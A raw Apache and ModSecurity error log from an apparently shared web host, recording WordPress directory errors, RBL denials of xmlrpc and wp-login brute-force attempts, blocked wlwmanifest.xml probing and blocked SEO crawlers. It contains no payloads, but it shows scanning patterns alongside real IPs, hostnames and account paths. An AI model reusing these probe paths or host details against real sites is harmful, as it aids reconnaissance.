[Tue May 26 17:18:57.874661 2026] [autoindex:error] [pid 869189:tid 869418] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:58.138134 2026] [security2:error] [pid 869189:tid 869330] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIqdB5TZSn88J_orr-9AAAAAo"]
[Tue May 26 17:18:58.245154 2026] [security2:error] [pid 869189:tid 869397] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIqtB5TZSn88J_orr_BgAAAE0"]
[Tue May 26 17:18:58.766479 2026] [security2:error] [pid 869189:tid 869324] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIqtB5TZSn88J_orr_GQAAAAQ"]
[Tue May 26 17:18:59.120026 2026] [autoindex:error] [pid 869189:tid 869418] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/css/dist/edit-widgets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:59.355037 2026] [autoindex:error] [pid 869189:tid 869337] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/Requests/src/Exception/Http/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:59.540784 2026] [autoindex:error] [pid 869189:tid 869416] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:59.732231 2026] [autoindex:error] [pid 869189:tid 869402] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/Text/Diff/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:00.024814 2026] [autoindex:error] [pid 869189:tid 869406] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:00.320534 2026] [security2:error] [pid 869189:tid 869377] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIq9B5TZSn88J_orr_TQAAADk"]
[Tue May 26 17:19:00.392304 2026] [security2:error] [pid 869189:tid 869346] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIrNB5TZSn88J_orr_XAAAABo"]
[Tue May 26 17:19:00.975061 2026] [security2:error] [pid 869189:tid 869330] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIrNB5TZSn88J_orr_bgAAAAo"]
[Tue May 26 17:19:01.263089 2026] [security2:error] [pid 869189:tid 869416] [client 66.249.70.198:38647] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahWIrdB5TZSn88J_orr_egAAAGA"]
[Tue May 26 17:19:01.710955 2026] [security2:error] [pid 869189:tid 869371] [client 185.92.25.52:33955] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIrdB5TZSn88J_orr_ggAAADM"]
[Tue May 26 17:19:02.749725 2026] [security2:error] [pid 869189:tid 869421] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIrtB5TZSn88J_orr_oQAAAGU"]
[Tue May 26 17:19:03.326190 2026] [security2:error] [pid 869189:tid 869436] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIrtB5TZSn88J_orr_sAAAAHQ"]
[Tue May 26 17:19:04.179155 2026] [security2:error] [pid 869189:tid 869345] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIsNB5TZSn88J_orr_zwAAABk"]
[Tue May 26 17:19:04.626386 2026] [security2:error] [pid 869189:tid 869364] [client 223.235.98.214:14198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIsNB5TZSn88J_orr_2QAAACw"]
[Tue May 26 17:19:04.626521 2026] [security2:error] [pid 869189:tid 869364] [client 223.235.98.214:14198] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIsNB5TZSn88J_orr_2QAAACw"]
[Tue May 26 17:19:04.810190 2026] [security2:error] [pid 869189:tid 869423] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIsNB5TZSn88J_orr_3AAAAGc"]
[Tue May 26 17:19:05.099000 2026] [security2:error] [pid 869189:tid 869271] [remote 51.38.192.10:47488] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.192.38.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWIsNB5TZSn88J_orr_4wAAMFA"]
[Tue May 26 17:19:05.187383 2026] [security2:error] [pid 869189:tid 869367] [client 203.194.101.7:60620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIsdB5TZSn88J_orr_6gAAAC8"]
[Tue May 26 17:19:05.187541 2026] [security2:error] [pid 869189:tid 869367] [client 203.194.101.7:60620] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIsdB5TZSn88J_orr_6gAAAC8"]
[Tue May 26 17:19:05.976794 2026] [autoindex:error] [pid 869189:tid 869447] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/html-api/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:06.076389 2026] [security2:error] [pid 869189:tid 869338] [client 172.225.180.169:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWIsdB5TZSn88J_orr__AAAABI"]
[Tue May 26 17:19:06.208552 2026] [autoindex:error] [pid 869189:tid 869390] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/sitemaps/providers/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:06.740795 2026] [autoindex:error] [pid 869189:tid 869427] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/Text/Diff/Engine/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:07.276024 2026] [autoindex:error] [pid 869189:tid 869440] [client 185.92.25.52:33955] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:07.542865 2026] [autoindex:error] [pid 869189:tid 869327] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/blocks/calendar/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:07.864027 2026] [security2:error] [pid 869189:tid 869396] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIs9B5TZSn88J_oroALgAAAEw"]
[Tue May 26 17:19:07.877721 2026] [security2:error] [pid 869189:tid 869386] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIs9B5TZSn88J_oroAPgAAAEI"]
[Tue May 26 17:19:08.361060 2026] [autoindex:error] [pid 869189:tid 869406] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-content/themes/twentytwentyfour/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:08.651457 2026] [security2:error] [pid 869189:tid 869387] [client 2.58.56.163:61524] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "soft.ucdc.co.in"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWItNB5TZSn88J_oroAWQAAAEM"]
[Tue May 26 17:19:08.820429 2026] [security2:error] [pid 869189:tid 869347] [client 92.222.108.108:20772] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "moneyapp.com.co"] [uri "/robots.txt"] [unique_id "ahWItNB5TZSn88J_oroAYAAAABs"]
[Tue May 26 17:19:08.820544 2026] [security2:error] [pid 869189:tid 869347] [client 92.222.108.108:20772] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "moneyapp.com.co"] [uri "/robots.txt"] [unique_id "ahWItNB5TZSn88J_oroAYAAAABs"]
[Tue May 26 17:19:08.910041 2026] [security2:error] [pid 869189:tid 869442] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWItNB5TZSn88J_oroAXwAAAHo"]
[Tue May 26 17:19:09.279985 2026] [security2:error] [pid 869189:tid 869367] [client 2.58.56.163:61647] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "soft.ucdc.co.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWItdB5TZSn88J_oroAbgAAAC8"]
[Tue May 26 17:19:09.333057 2026] [security2:error] [pid 869189:tid 869223] [remote 74.7.241.58:41452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWItdB5TZSn88J_oroAcgAAFiA"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:19:09.590186 2026] [security2:error] [pid 869189:tid 869410] [client 2.58.56.163:57327] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "soft.ucdc.co.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWItdB5TZSn88J_oroAdgAAAFo"]
[Tue May 26 17:19:09.800280 2026] [security2:error] [pid 869189:tid 869391] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWItdB5TZSn88J_oroAeQAAAEc"]
[Tue May 26 17:19:09.885389 2026] [security2:error] [pid 869189:tid 869435] [client 2.58.56.163:50329] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "soft.ucdc.co.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWItdB5TZSn88J_oroAgwAAAHM"]
[Tue May 26 17:19:10.174117 2026] [security2:error] [pid 869189:tid 869359] [client 54.39.89.147:25450] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "moneyapp.com.co"] [uri "/"] [unique_id "ahWIttB5TZSn88J_oroAigAAACc"]
[Tue May 26 17:19:10.174233 2026] [security2:error] [pid 869189:tid 869359] [client 54.39.89.147:25450] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "moneyapp.com.co"] [uri "/"] [unique_id "ahWIttB5TZSn88J_oroAigAAACc"]
[Tue May 26 17:19:10.175582 2026] [security2:error] [pid 869189:tid 869398] [client 2.58.56.163:49841] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "soft.ucdc.co.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWIttB5TZSn88J_oroAiwAAAE4"]
[Tue May 26 17:19:10.320126 2026] [security2:error] [pid 869189:tid 869396] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWItdB5TZSn88J_oroAggAAAEw"]
[Tue May 26 17:19:10.366603 2026] [security2:error] [pid 869189:tid 869411] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIttB5TZSn88J_oroAjgAAAFs"]
[Tue May 26 17:19:10.484920 2026] [security2:error] [pid 869189:tid 869380] [client 2.58.56.163:62338] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "soft.ucdc.co.in"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWIttB5TZSn88J_oroAlQAAADw"]
[Tue May 26 17:19:10.791654 2026] [security2:error] [pid 869189:tid 869356] [client 2.58.56.163:56513] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "soft.ucdc.co.in"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWIttB5TZSn88J_oroAnAAAACQ"]
[Tue May 26 17:19:11.107251 2026] [security2:error] [pid 869189:tid 869433] [client 2.58.56.163:55712] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "soft.ucdc.co.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWIt9B5TZSn88J_oroAqQAAAHE"]
[Tue May 26 17:19:11.153701 2026] [security2:error] [pid 869189:tid 869421] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIt9B5TZSn88J_oroApQAAAGU"]
[Tue May 26 17:19:11.419085 2026] [security2:error] [pid 869189:tid 869333] [client 2.58.56.163:49209] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "soft.ucdc.co.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWIt9B5TZSn88J_oroAuQAAAA0"]
[Tue May 26 17:19:11.419546 2026] [security2:error] [pid 869189:tid 869430] [client 85.208.96.211:17738] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahWIt9B5TZSn88J_oroAugAAAG4"]
[Tue May 26 17:19:11.419688 2026] [security2:error] [pid 869189:tid 869430] [client 85.208.96.211:17738] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahWIt9B5TZSn88J_oroAugAAAG4"]
[Tue May 26 17:19:11.619552 2026] [security2:error] [pid 869189:tid 869342] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIt9B5TZSn88J_oroArwAAABY"]
[Tue May 26 17:19:11.718264 2026] [security2:error] [pid 869189:tid 869343] [client 2.58.56.163:61141] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "soft.ucdc.co.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWIt9B5TZSn88J_oroAwwAAABc"]
[Tue May 26 17:19:12.006368 2026] [autoindex:error] [pid 869189:tid 869361] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/Text/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:12.009484 2026] [security2:error] [pid 869189:tid 869380] [client 2.58.56.163:54994] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "soft.ucdc.co.in"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWIuNB5TZSn88J_oroA1wAAADw"]
[Tue May 26 17:19:12.167705 2026] [security2:error] [pid 869189:tid 869371] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIt9B5TZSn88J_oroAxwAAADM"]
[Tue May 26 17:19:12.184652 2026] [autoindex:error] [pid 869189:tid 869389] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/sitemaps/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:12.296152 2026] [security2:error] [pid 869189:tid 869387] [client 2.58.56.163:50234] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "soft.ucdc.co.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWIuNB5TZSn88J_oroA3gAAAEM"]
[Tue May 26 17:19:12.420661 2026] [autoindex:error] [pid 869189:tid 869433] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/sodium_compat/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:19:12.585993 2026] [security2:error] [pid 869189:tid 869331] [client 2.58.56.163:56752] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "soft.ucdc.co.in"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWIuNB5TZSn88J_oroA7AAAAAs"]
[Tue May 26 17:19:12.729500 2026] [autoindex:error] [pid 869189:tid 869420] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/js/dist/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
